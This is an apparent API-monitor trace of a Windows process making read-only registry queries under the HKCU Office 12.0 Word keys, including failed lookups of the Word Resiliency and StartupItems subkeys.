[0086.189] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.189] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x41c) returned 0x0
[0086.189] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.189] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x420) returned 0x0
[0086.189] RegCloseKey (hKey=0x41c) returned 0x0
[0086.189] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x41c) returned 0x0
[0086.190] RegCloseKey (hKey=0x420) returned 0x0
[0086.190] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x420) returned 0x0
[0086.190] RegCloseKey (hKey=0x41c) returned 0x0
[0086.190] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x41c) returned 0x0
[0086.190] RegCloseKey (hKey=0x420) returned 0x0
[0086.190] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.190] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x420) returned 0x0
[0086.190] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.190] RegOpenKeyExW (in: hKey=0x420, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x424) returned 0x0
[0086.190] RegCloseKey (hKey=0x420) returned 0x0
[0086.190] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x420) returned 0x0
[0086.191] RegCloseKey (hKey=0x424) returned 0x0
[0086.191] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0x420, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x424) returned 0x0
[0086.191] RegCloseKey (hKey=0x420) returned 0x0
[0086.191] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x420) returned 0x0
[0086.191] RegCloseKey (hKey=0x424) returned 0x0
[0086.191] RegQueryInfoKeyW (in: hKey=0x420, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.191] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x0) returned 0x2
[0086.191] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.191] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x424) returned 0x0
[0086.191] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x428) returned 0x0
[0086.192] RegCloseKey (hKey=0x424) returned 0x0
[0086.192] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x424) returned 0x0
[0086.192] RegCloseKey (hKey=0x428) returned 0x0
[0086.192] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0x424, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x428) returned 0x0
[0086.192] RegCloseKey (hKey=0x424) returned 0x0
[0086.192] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x424) returned 0x0
[0086.192] RegCloseKey (hKey=0x428) returned 0x0
[0086.192] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c72c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c72c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c728*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.192] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.192] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x428) returned 0x0
[0086.193] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.193] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.193] RegCloseKey (hKey=0x428) returned 0x0
[0086.193] RegQueryInfoKeyW (in: hKey=0x42c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.193] RegOpenKeyExW (in: hKey=0x42c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x428) returned 0x0
[0086.193] RegCloseKey (hKey=0x42c) returned 0x0
[0086.193] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.193] RegOpenKeyExW (in: hKey=0x428, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.193] RegCloseKey (hKey=0x428) returned 0x0
[0086.193] RegQueryInfoKeyW (in: hKey=0x42c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.193] RegOpenKeyExW (in: hKey=0x42c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x428) returned 0x0
[0086.193] RegCloseKey (hKey=0x42c) returned 0x0
[0086.193] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.193] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x0) returned 0x2
[0086.194] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c80c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c80c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c808*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x42c) returned 0x0
[0086.194] RegCloseKey (hKey=0x42c) returned 0x0
[0086.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.195] RegCloseKey (hKey=0x42c) returned 0x0
[0086.195] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
